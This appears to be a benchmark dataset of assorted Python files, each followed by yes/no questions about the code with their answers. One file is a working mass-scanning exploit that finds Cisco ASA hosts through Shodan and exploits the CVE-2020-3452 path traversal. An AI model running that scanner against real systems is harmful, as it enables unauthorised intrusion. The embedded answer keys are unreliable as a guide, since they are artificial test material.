    op.add_column('comments', sa.Column('comment', sa.VARCHAR(), autoincrement=False, nullable=True))
    op.add_column('blogs', sa.Column('text', sa.VARCHAR(length=255), autoincrement=False, nullable=True))
    # ### end Alembic commands ###
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answe... | 3 | migrations/versions/d1168fc41a41_modify_migration.py | lewis-murgor/Blog |
from models.project import Project
import time
class ProjectHelper:
    """Selenium helper for the project-administration pages."""

    def __init__(self, app):
        # app: fixture that owns the WebDriver (exposed as app.dw).
        self.app = app

    def open_projects_page(self):
        """Navigate Manage -> Manage Projects unless already on that page."""
        dw = self.app.dw
        if not dw.current_url.endswith("/manage_proj_page.php"):
            dw.find_element_by_link_text("Manage").click()
            dw.find_element_by_link_text("Manage Projects").click()

    def create(self, project):
        """Create a new project from a Project model (name + description)."""
        dw = self.app.dw
        self.open_projects_page()
        dw.find_element_by_xpath("//input[@value='Create New Project']").click()
        dw.find_element_by_name("name").send_keys(project.name)
        dw.find_element_by_xpath("//textarea[@name='description']").send_keys(
            project.description)
        dw.find_element_by_xpath("//input[@value='Add Project']").click()
        # Fixed wait for the page to settle -- consider an explicit wait instead.
        time.sleep(3)

    def get_projects_list(self):
        """Scrape the projects table into a list of Project models."""
        dw = self.app.dw
        self.open_projects_page()
        projects = []
        for element in dw.find_elements_by_xpath(
                "//table[@class='width100']//tr[contains(@class, 'row')]"):
            name = element.find_element_by_xpath(".//td[1]").text
            description = element.find_element_by_xpath(".//td[5]").text
            projects.append(Project(name=name, description=description))
        # The first matched row is the table header, not a real project.
        projects.pop(0)
        return projects

    def delete_by_index(self, index):
        """Delete the project shown in table row *index* (0-based)."""
        dw = self.app.dw
        self.open_projects_page()
        dw.find_elements_by_xpath("//table[@class='width100']//tr[contains("
                                  "@class, 'row')]//td//a[contains("
                                  "@href, 'edit')]")[index].click()
        time.sleep(1)
        # First click opens the confirmation page, second click confirms.
        dw.find_element_by_xpath("//input[@value='Delete Project']").click()
        dw.find_element_by_xpath("//input[@value='Delete Project']").click()
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | fixture/projects.py | AndreevaAnastasiya/py_training_mantis |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this is to generate a config file when the --config flag is passed
from configparser import ConfigParser
import logging
from pathlib import Path
from .input_utils import choice, yes_or_no
log = logging.getLogger('pfg.config')
log.addHandler(logging.NullHandler())
home = Path.home()
def make_pfgrc():
    """Create (or offer to overwrite) the user's pfgrc config file.

    Interactive: every branch asks via yes_or_no before touching the
    filesystem. NOTE(review): ``touch()`` on an existing file only updates
    its mtime -- nothing is actually rewritten yet (see trailing TODO).
    """
    config = home.joinpath(".config/pfg/pfgrc")
    if config.exists():
        if config.is_file():
            if yes_or_no("a pfgrc file exists. overwrite the old one?"):
                config.touch()
        else:
            print(f'{config} exists and is not a file')
    else:
        # BUG FIX: the prompt string was missing its f-prefix and showed the
        # literal text "{config}" instead of the actual path.
        if yes_or_no(f"make pfgrc at '{config}'"):
            try:
                config.parent.mkdir()
                print(f'creating \'{config.parent}\'')
            except FileExistsError:
                print(f'\'{config.parent}\' exists')
            print('writing \'pfgrc\'')
            config.touch()
        else:
            print('not creating \'pfgrc\' file')
    print()
    # actually write file.. in the future
def make_template_dir():
    """Ensure the custom-template folder exists, asking before creating it."""
    template_dir = home.joinpath(".config/pfg/templates")
    print('checking if a template folder exists')
    print()
    if not template_dir.exists():
        print('no template folder found')
        if yes_or_no(f'create \'{template_dir}\'?'):
            print(f'creating template folder at \'{template_dir}\'')
            template_dir.mkdir(parents=True)
            # move sample.fgt here to reference
        else:
            print('not creating template dir')
    else:
        print('a folder for custom templates already exists')
        print(f'here -> \'{template_dir}\'')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | pfg/config_utils.py | michaelfreyj/pfg |
# imports - module imports
from pipupgrade import cli
from pipupgrade.table import _sanitize_string, Table
def test__sanitize_string():
    """_sanitize_string should strip terminal color/style escape codes."""
    assert _sanitize_string(cli.format("foobar", cli.GREEN)) == "foobar"
    assert _sanitize_string(cli.format("foobar", cli.BOLD)) == "foobar"
def test_table():
    """A new Table is empty; render() emits one line per row plus one for a header."""
    table = Table()
    assert table.empty
    dummy = ["foo", "bar"]
    table.insert(dummy)
    assert not table.empty
    string = table.render()
    assert string.count("\n") == 1
    # Setting a header adds an extra rendered line.
    table.header = dummy
    string = table.render()
    assert string.count("\n") == 2
    table.insert(dummy)
    string = table.render()
    assert string.count("\n") == 3
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fals... | 3 | tests/pipupgrade/test_table.py | max-nicholson/pipupgrade |
from unittest import TestCase
from pya import *
import numpy as np
import logging
logging.basicConfig(level=logging.DEBUG)
class TestUgen(TestCase):
    """Checks that each unit generator honors sr, amp, duration and channels."""

    def setUp(self):
        # No shared fixtures needed.
        pass

    def tearDown(self):
        pass

    def test_sine(self):
        # 1 s at half sample rate, stereo: expect (sr, 2) samples peaking at amp.
        sine = Ugen().sine(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
        self.assertEqual(44100 // 2, sine.sr)
        self.assertAlmostEqual(0.5, np.max(sine.sig), places=6)
        self.assertEqual((44100 // 2, 2), sine.sig.shape)

    def test_cos(self):
        cos = Ugen().cos(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
        self.assertEqual(44100 // 2, cos.sr)
        self.assertAlmostEqual(0.5, np.max(cos.sig), places=6)
        self.assertEqual((44100 // 2, 2), cos.sig.shape)

    def test_square(self):
        square = Ugen().square(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
        self.assertEqual(44100 // 2, square.sr)
        self.assertAlmostEqual(0.5, np.max(square.sig), places=6)
        self.assertEqual((44100 // 2, 2), square.sig.shape)

    def test_sawooth(self):
        saw = Ugen().sawtooth(freq=200, amp=0.5, dur=1.0, sr=44100 // 2, channels=2)
        self.assertEqual(44100 // 2, saw.sr)
        self.assertAlmostEqual(0.5, np.max(saw.sig), places=6)
        self.assertEqual((44100 // 2, 2), saw.sig.shape)

    def test_noise(self):
        # Smoke test only: both noise types must construct without error.
        white = Ugen().noise(type="white")
        pink = Ugen().noise(type="pink")
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | tests/test_ugen.py | m---w/pya |
import socket
import os
import time
def do_sleep():
    # Fixed 1-second pause; alternative workload to do_work() (see handler).
    time.sleep(1)
def do_work(iterations=5_000_000):
    """Monte-Carlo estimate of pi as a CPU-bound workload.

    Generalized: the previously hard-coded iteration count is now a
    defaulted parameter (call sites without arguments behave as before),
    and the estimate is returned in addition to being printed.

    Args:
        iterations: number of random points to sample.

    Returns:
        float: the pi estimate.
    """
    from random import random
    count = 0
    for _ in range(iterations):
        x = random()
        y = random()
        # Point inside the unit quarter-circle?
        if x * x + y * y <= 1.0:
            count = count + 1
    pi = 4.0 * count / iterations
    print(pi)
    return pi
def handler(event, context):
    """Lambda-style entry point: runs the workload and reports timing plus
    host/container identity.

    Args:
        event: invocation payload (unused).
        context: Lambda context or None when run locally.

    Returns:
        dict with timing, activation id, host/container identity and uptime.
    """
    init_time = time.time()
    print('Python function START')
    # BUG FIX: these were only bound when a context was provided, so the
    # local-run path (context=None, used by the __main__ guard below)
    # crashed with NameError at the return statement.
    func_activation_ID = None
    func_mem_limit = None
    if context is not None:
        func_activation_ID = context.aws_request_id
        func_mem_limit = context.memory_limit_in_mb
    # Identify container
    host_name = socket.gethostname()
    host_ip = socket.gethostbyname(host_name)
    command = 'cat /proc/self/cgroup | grep sandbox-root'
    container_id = os.popen(command).read().rstrip()
    command = 'cat /proc/uptime | tr " " "\n" | head -1'
    uptime = os.popen(command).read().rstrip()
    # do_sleep()
    do_work()
    print('Python function END')
    end_time = time.time()
    return {
        'initTime_ms': init_time*1000,
        'endTime_ms': end_time*1000,
        'duration_ms': (end_time-init_time)*1000,
        'funcActivationID': func_activation_ID,
        'hostname': host_name,
        'hostnameIP': host_ip,
        'containerID': container_id,
        'mem_limit': func_mem_limit,
        'uptime': uptime,
    }


if __name__ == "__main__":
    print(handler({}, None))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | aws/test_function.py | danielBCN/faas-parallelism-benchmark |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains utilities for monitoring client side calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
class Context(six.with_metaclass(abc.ABCMeta, object)):
    """Interface for implementations of client monitoring context manager.
    All client operations are executed inside this context.
    """
    @abc.abstractmethod
    def __init__(self, operation):
        # operation: identifier/name of the client operation being monitored.
        pass
    @abc.abstractmethod
    def __enter__(self):
        # Enter the monitoring scope; implementations return the context.
        return self
    @abc.abstractmethod
    def __exit__(self, exc_type,
                 exc_value,
                 traceback):
        # Standard context-manager exit signature; exception info is passed
        # through so implementations can record failures.
        pass
class Nop(Context):
    """Default implementation of Context that does nothing."""
    # pylint: disable=useless-super-delegation
    def __init__(self, operation):
        # Delegates to the abstract base purely to satisfy the interface.
        super(Nop, self).__init__(operation)
    def __enter__(self):
        return self
    def __exit__(self, exc_type,
                 exc_value,
                 traceback):
        # Intentionally ignores exception info: no monitoring is performed.
        pass
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | client/monitor_.py | tungsten-infra/containerregistry |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
class ModelTests(TestCase):
    """Tests for the custom user model and its manager."""

    def test_create_user_with_email_successful(self):
        """A user created with an email address can authenticate."""
        new_user = get_user_model().objects.create_user(
            email='test@gmail.com',
            username='test1'
        )
        new_user.set_password('456@3')
        self.assertEqual(new_user.email, 'test@gmail.com')
        self.assertTrue(new_user.check_password('456@3'))

    def test_user_email_is_normalised(self):
        """The email used to sign in is stored lowercased."""
        raw_email = 'test@STONEWELLTECH.com'
        created = get_user_model().objects.create_user(raw_email, 'test123')
        self.assertEqual(created.email, raw_email.lower())

    def test_create_user_invalid_email(self):
        """Creating a user without an email raises ValueError."""
        with self.assertRaises(ValueError):
            get_user_model().objects.create_user(None, 'test123')

    def test_create_new_super_user(self):
        """create_superuser sets both is_superuser and is_staff."""
        superuser = get_user_model().objects.create_superuser(
            'test@stonewelltech.com',
            'test123'
        )
        # is_superuser is contributed by PermissionsMixin.
        self.assertTrue(superuser.is_superuser)
        self.assertTrue(superuser.is_staff)
class UserModelTests(TestCase):
    '''
    Test whether the user characteristics are saved well
    '''
    def setUp(self):
        """Create an admin session and a regular user for the tests."""
        self.client = Client()
        # Bug fix: self.admin_user was referenced by force_login before ever
        # being created, and a stray `user.set_password(password)` line used
        # undefined names. Create the admin user first, then the regular user.
        self.admin_user = get_user_model().objects.create_superuser(
            'admin@stonewelltech.com',
            'test123'
        )
        self.client.force_login(self.admin_user)
        self.user = get_user_model().objects.create_user(
            email = 'user@stonewelltech.com',
            username = 'Test username'
        )
        self.user.set_password('test123')
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fals... | 3 | backend/user/tests/test_models.py | Ssents/stonewell_tech |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.14.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import kubernetes_asyncio.client
from kubernetes_asyncio.client.models.v1beta1_stateful_set_status import V1beta1StatefulSetStatus # noqa: E501
from kubernetes_asyncio.client.rest import ApiException
class TestV1beta1StatefulSetStatus(unittest.TestCase):
    """V1beta1StatefulSetStatus unit test stubs"""
    # Auto-generated skeleton (openapi-generator); setUp/tearDown are
    # intentionally empty placeholders.
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testV1beta1StatefulSetStatus(self):
        """Test V1beta1StatefulSetStatus"""
        # FIXME: construct object with mandatory attributes with example values
        # model = kubernetes_asyncio.client.models.v1beta1_stateful_set_status.V1beta1StatefulSetStatus()  # noqa: E501
        pass
if __name__ == '__main__':
    # Allow running this generated test module directly.
    unittest.main()
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer":... | 3 | kubernetes_asyncio/test/test_v1beta1_stateful_set_status.py | aK0nshin/kubernetes_asyncio |
import unittest.mock as mock
import pytest
import requests
from transiter.scheduler import client
@pytest.fixture
def scheduler_post_response(monkeypatch):
response = mock.Mock()
def post(*args, **kwargs):
return response
monkeypatch.setattr(requests, "post", post)
return response
@pytest.fixture
def scheduler_get_response(monkeypatch):
response = mock.Mock()
def get(*args, **kwargs):
return response
monkeypatch.setattr(requests, "get", get)
return response
def test_ping__pass(scheduler_get_response):
    # A healthy scheduler returns its response body parsed as an int.
    scheduler_get_response.raise_for_status = lambda: None
    scheduler_get_response.text = "3"
    assert client.ping() == 3
def test_ping__fail(scheduler_get_response):
    # Request-level failures are swallowed and reported as None.
    scheduler_get_response.raise_for_status.side_effect = requests.RequestException()
    assert client.ping() is None
def test_refresh_tasks__pass(scheduler_post_response):
    scheduler_post_response.raise_for_status = lambda: None
    assert client.refresh_tasks() is True
def test_refresh_tasks__fail(scheduler_post_response):
    scheduler_post_response.raise_for_status.side_effect = requests.RequestException()
    assert client.refresh_tasks() is False
def test_refresh_tasks__do_not_swallow_all_exceptions(scheduler_post_response):
    # Only requests errors may be caught; anything else must propagate.
    scheduler_post_response.raise_for_status.side_effect = ValueError()
    with pytest.raises(ValueError):
        client.refresh_tasks()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | tests/unit/scheduler/test_client.py | jamespfennell/realtimerail |
import logging
from urllib.parse import urljoin
import requests
from eth_typing import ChecksumAddress
from safe_transaction_service.tokens.clients.exceptions import CannotGetPrice
logger = logging.getLogger(__name__)
class CoingeckoClient:
    """Thin client for the public Coingecko price API (USD prices only)."""
    base_url = 'https://api.coingecko.com/'
    def __init__(self):
        # Reuse one session for connection pooling across requests.
        self.http_session = requests.Session()
    def _get_price(self, url: str, name: str):
        # Shared fetch/parse helper for name- and address-based lookups.
        # Raises CannotGetPrice on any HTTP, JSON or missing-price problem.
        try:
            response = self.http_session.get(url, timeout=10)
            if not response.ok:
                raise CannotGetPrice
            # Result is returned with lowercased `token_address`
            price = response.json().get(name)
            if price and price.get('usd'):
                return price['usd']
            else:
                raise CannotGetPrice(f'Price from url={url} is {price}')
        except (ValueError, IOError) as e:
            # requests exceptions subclass IOError; ValueError covers bad JSON.
            logger.warning('Problem getting usd value on coingecko for token-name=%s', name)
            raise CannotGetPrice from e
    def get_price(self, name: str) -> float:
        """
        :param name: coin name
        :return: usd price for token name
        :raises CannotGetPrice: if the price cannot be retrieved
        """
        name = name.lower()
        url = urljoin(self.base_url,
                      f'/api/v3/simple/price?ids={name}&vs_currencies=usd')
        return self._get_price(url, name)
    def get_token_price(self, token_address: ChecksumAddress) -> float:
        """
        :param token_address: ethereum token contract address
        :return: usd price for token address
        :raises CannotGetPrice: if the price cannot be retrieved
        """
        token_address = token_address.lower()
        url = urljoin(self.base_url,
                      f'api/v3/simple/token_price/ethereum?contract_addresses={token_address}&vs_currencies=usd')
        return self._get_price(url, token_address)
    def get_ewt_usd_price(self) -> float:
        # Convenience wrapper for the Energy Web Token.
        return self.get_price('energy-web-token')
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | safe_transaction_service/tokens/clients/coingecko_client.py | vaporyorg/safe-transaction-service |
# Portfolio
def query_portfolio():
    """Return the full portfolio snapshot. Not implemented yet (stub)."""
    pass
# Positions
def query_open_positions():
    """Return all currently open positions. Not implemented yet (stub)."""
    pass
def has_open_position(symbol):
    """Return whether an open position exists for *symbol*. Stub."""
    pass
def query_open_position_by_symbol(symbol):
    """Return the open position for *symbol*, if any. Stub."""
    pass
# Balances
def query_balance(asset):
    """Return the total balance for *asset*. Stub."""
    pass
def query_balances():
    """Return balances for all assets. Stub."""
    pass
def query_balance_free(asset):
    """Return the free (unlocked) balance for *asset*. Stub."""
    pass
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exclu... | 3 | trality_simulator/portfolio.py | ffavero/trality-simulator |
from __future__ import unicode_literals
import swapper
from django.db import models
from accelerator_abstract.models.accelerator_model import AcceleratorModel
class BaseProgramFamilyLocation(AcceleratorModel):
    # Join model linking a ProgramFamily to a Location; `primary` marks the
    # family's primary location. Concrete model is resolved via django-swapper.
    program_family = models.ForeignKey(
        swapper.get_model_name(AcceleratorModel.Meta.app_label,
                               "ProgramFamily"),
        on_delete=models.CASCADE)
    location = models.ForeignKey(
        swapper.get_model_name(AcceleratorModel.Meta.app_label,
                               "Location"),
        on_delete=models.CASCADE)
    # No default: callers must state explicitly whether this is primary.
    primary = models.BooleanField()
    class Meta(AcceleratorModel.Meta):
        db_table = 'accelerator_programfamilylocation'
        abstract = True
        # Each (program_family, location) pair may appear only once.
        unique_together = ('program_family', 'location')
        verbose_name = "Program Family Location"
        verbose_name_plural = "Program Family Locations"
    def __str__(self):
        return "Location %s for %s" % (self.location, self.program_family)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
}... | 3 | accelerator_abstract/models/base_program_family_location.py | masschallenge/django-accelerator |
"""Define the common values and functions to run the tests."""
from pathlib import Path
from scrapd.core import constant
TEST_ROOT_DIR = Path(__file__).resolve().parent
TEST_DATA_DIR = TEST_ROOT_DIR / 'data'
TEST_DUMP_DIR = TEST_ROOT_DIR.parent / constant.DUMP_DIR
def load_test_page(page):
    """Load a test page."""
    return (TEST_DATA_DIR / page).read_text()
def load_dumped_page(page):
    """Load a dumped page."""
    return (TEST_DUMP_DIR / page).read_text()
def scenario_inputs(scenarios):
    """Extract the input payload (first element) of each scenario tuple."""
    return [scenario[0] for scenario in scenarios]
def scenario_ids(scenarios):
    """Extract the ID (second element) of each scenario tuple."""
    return [scenario[1] for scenario in scenarios]
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | tests/test_common.py | scrapd/scrapd |
import pytest
from aiopg.sa.connection import _distill_params
pytest.importorskip("aiopg.sa") # noqa
def test_distill_none():
assert _distill_params(None, None) == []
def test_distill_no_multi_no_param():
assert _distill_params((), {}) == []
def test_distill_dict_multi_none_param():
assert _distill_params(None, {"foo": "bar"}) == [{"foo": "bar"}]
def test_distill_dict_multi_empty_param():
assert _distill_params((), {"foo": "bar"}) == [{"foo": "bar"}]
def test_distill_single_dict():
assert _distill_params(({"foo": "bar"},), {}) == [{"foo": "bar"}]
def test_distill_single_list_strings():
assert _distill_params((["foo", "bar"],), {}) == [["foo", "bar"]]
def test_distill_single_list_tuples():
v1 = _distill_params(([("foo", "bar"), ("bat", "hoho")],), {})
v2 = [('foo', 'bar'), ('bat', 'hoho')]
assert v1 == v2
def test_distill_single_list_tuple():
v1 = _distill_params(([("foo", "bar")],), {})
v2 = [('foo', 'bar')]
assert v1 == v2
def test_distill_multi_list_tuple():
v1 = _distill_params(
([("foo", "bar")], [("bar", "bat")]),
{})
v2 = ([('foo', 'bar')], [('bar', 'bat')])
assert v1 == v2
def test_distill_multi_strings():
assert _distill_params(("foo", "bar"), {}) == [('foo', 'bar')]
def test_distill_single_list_dicts():
v1 = _distill_params(([{"foo": "bar"}, {"foo": "hoho"}],), {})
assert v1 == [{'foo': 'bar'}, {'foo': 'hoho'}]
def test_distill_single_string():
assert _distill_params(("arg",), {}) == [["arg"]]
def test_distill_multi_string_tuple():
v1 = _distill_params((("arg", "arg"),), {})
assert v1 == [("arg", "arg")]
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | tests/test_sa_distil.py | dduong42/aiopg |
#!/usr/bin/env python
#
# assa-2020.py
# Search SHODAN for Cisco ASA CVE-2020-3452
#
# Author: random_robbie
import shodan
import sys
import re
import requests
from time import sleep
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Configuration
API_KEY = "YOURAPIKEY"
SEARCH_FOR = 'webvpn port:"443"'
FILE = "/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
session = requests.Session()
def filter_result(str):
    """Return *str* with leading and trailing whitespace removed.

    Bug fix: the original called strip()/lstrip()/rstrip() without using the
    returned values (str methods return new strings), so it was a no-op that
    returned the input unchanged. The parameter name shadows the builtin
    `str`; kept for backward compatibility with existing callers.
    """
    return str.strip()
def grab_file(IP, PORT, FILE):
    """Probe one host for the CVE-2020-3452 path traversal and log hits.

    :param IP: target IP address (string)
    :param PORT: target port (string)
    :param FILE: traversal URL path to request
    Vulnerable URLs are appended to ./cfg/vun.cfg.
    """
    print ("[*] Testing: "+IP+" on Port: "+PORT+"[*]\n")
    try:
        URL = "https://"+IP+":"+PORT+""+FILE+""
        headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1"}
        response = session.get(URL, headers=headers, timeout=15, verify=False)
        result = response.text
        # The leaked portal_inc.lua contains this marker when traversal worked.
        if 'CONF_VIRTUAL_KEYBOARD' in result:
            # Bug fix: use a context manager so the log file is always closed.
            with open("./cfg/vun.cfg", "a") as text_file:
                text_file.write(""+URL+"\n")
            print ("[*] Vun VPN ... Found [*]\n")
            print (result)
        else:
            print ("[*] Not Vulnerable [*]\n ")
    except KeyboardInterrupt:
        print ("Ctrl-c pressed ...")
        sys.exit(1)
    except Exception as e:
        print (e)
        print ("[*] Nothing Found on IP: "+IP+" [*]\n")
try:
    # Setup the api
    api = shodan.Shodan(API_KEY)
    # Perform the search
    result = api.search(SEARCH_FOR)
    # Loop through the matches and print each IP
    for service in result['matches']:
        IP = service['ip_str']
        PORT = str(service['port'])
        CC = service['location']['country_name']  # NOTE(review): unused below
        grab_file (IP,PORT,FILE)
except KeyboardInterrupt:
    print ("Ctrl-c pressed ...")
    sys.exit(1)
except Exception as e:
    # Any Shodan/API failure aborts the whole scan with a message.
    print('Error: %s' % e)
    sys.exit(1)
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"a... | 3 | cisco/asa-2020.py | phiberoptick/My-Shodan-Scripts |
import json
import os
from app import app
def invalid_file_error_response(data) -> json:
    # 400 response for unsupported upload formats. NOTE(review): the `-> json`
    # annotations in this module are misleading — these return a Flask
    # response object (app.response_class), not the json module.
    data = {"detail_error": 'File format not supported only supported are .jpeg and .png but received a' + ' ' + data}
    response = app.response_class(
        response=json.dumps(data),
        status=400,
        mimetype='application/json'
    )
    return response
def valid_error_response(label) -> json:
    # 200 response carrying the predicted class label.
    # flash({"Given class of image is ": label})
    data = {"Given a class of image is ": label}
    response = app.response_class(
        response=json.dumps(data),
        mimetype='application/json'
    )
    return response
def invalid_error_response(data) -> json:
    # 400 response when no file was present in the request.
    data = {"detail_error": 'No file uploaded' + ' ' + data}
    response = app.response_class(
        response=json.dumps(data),
        status=400,
        mimetype='application/json'
    )
    return response
def db_timeout_error(data) -> json:
    # 400 response for database timeouts.
    data = {"detail_error": 'Db timeout' + ' ' + data}
    response = app.response_class(
        response=json.dumps(data),
        status=400,
        mimetype='application/json'
    )
    return response
def invalid_model_path_response(data) -> json:
    # 400 response when the trained model file cannot be located.
    data = {"detail_error": 'Application can not find the trained as' + ' ' + data}
    response = app.response_class(
        response=json.dumps(data),
        status=400,
        mimetype='application/json'
    )
    return response
def invalid_method_response() -> json:
    # 400 response for unsupported HTTP methods.
    data = {"detail_error": "requested method service is not supported by the application"}
    response = app.response_class(
        response=json.dumps(data),
        status=400,
        mimetype='application/json'
    )
    return response
def remove_img(path, img_name) -> bool:
    """Delete *img_name* from directory *path* and report success.

    :param path: directory containing the image
    :param img_name: file name of the image
    :return: True if the file no longer exists, False otherwise
    :raises FileNotFoundError: if the file did not exist (from os.remove)

    Bug fix: the original returned True on success but fell through and
    implicitly returned None otherwise; it also concatenated paths with '/'.
    """
    target = os.path.join(path, img_name)
    os.remove(target)
    # Explicitly verify deletion instead of returning an implicit None.
    return not os.path.exists(target)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
... | 3 | utils.py | rksingh95/prediction-service |
from load_data import LoadData
from check_solution import CheckSudoku
from brute_force.brute_force import BruteForce
from base_solver.solve_it_like_a_human import SolveItLikeAHuman
from genetic_algorithm.genetic_algorithm import GeneticAlgorithm
import numpy as np
import logging
logger = logging.getLogger('Sudoku Solver')
class SudokuSolver:
    """Loads a puzzle, runs a solving strategy and validates the result."""
    def __init__(self, path, dataset):
        # path/dataset identify the puzzle source consumed by LoadData.
        self.data_loader = LoadData()
        self.path = path
        self.dataset = dataset
        self.sudoku_checker = CheckSudoku()
    def run(self):
        """Solve one sudoku and check the candidate against the known solution."""
        initial_matrix, solution = self.data_loader.load_data(self.path, self.dataset)
        # Zeros in the matrix mark empty cells; the logs summarize difficulty.
        logger.info(f'Out of {(9 * 9) ** 9} possibilities this sudoku has {(9 * 9 - np.where(initial_matrix.flatten() == 0)[0].shape[0]) ** 9}')
        logger.info(f'Thd number of filled number is {np.where(initial_matrix.flatten() == 0)[0].shape[0]} out of {9*9}')
        # BruteForce(initial_matrix).run()
        is_feasible, candidate_solution = SolveItLikeAHuman().run(initial_matrix)
        # GeneticAlgorithm().run(initial_matrix)
        self.sudoku_checker.is_correct(solution) # TODO: Check when is a good idea to use a @staticmethod
        self.sudoku_checker.is_equal(candidate_solution, solution)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | src/sudoku_solver.py | Mai13/sudoku |
import constants
import frame_subscriber
import frame_receiver
# Income
def create_receiver():
    """Build a request/response FrameReceiver on the configured port."""
    receiver_port = constants.get_meta_frame_server_port()
    return frame_receiver.FrameReceiver(port=receiver_port)
def create_subscriber():
    """Build a FrameSubscriber; an empty topic means subscribe to all."""
    subscriber_port = constants.get_meta_frame_server_port()
    topic = constants.get_meta_frame_subscribe_topic()
    if "" == topic:
        subscriber = frame_subscriber.FrameSubscriber(port=subscriber_port)
    else:
        subscriber = frame_subscriber.FrameSubscriber(port=subscriber_port, topic=topic)
    return subscriber
def create_taker():
    """Create the configured frame taker (subscriber or receiver).

    Returns None (after printing a diagnostic) when the environment
    variable holds an unsupported take type.
    """
    taker = None
    take_type = constants.get_meta_frame_take_type()
    if constants.METADATA_FRAME_TAKE_TYPE_SUBSCRIBE == take_type:
        taker = create_subscriber()
    elif constants.METADATA_FRAME_TAKE_TYPE_RESPONSE == take_type:
        taker = create_receiver()
    if taker is None:
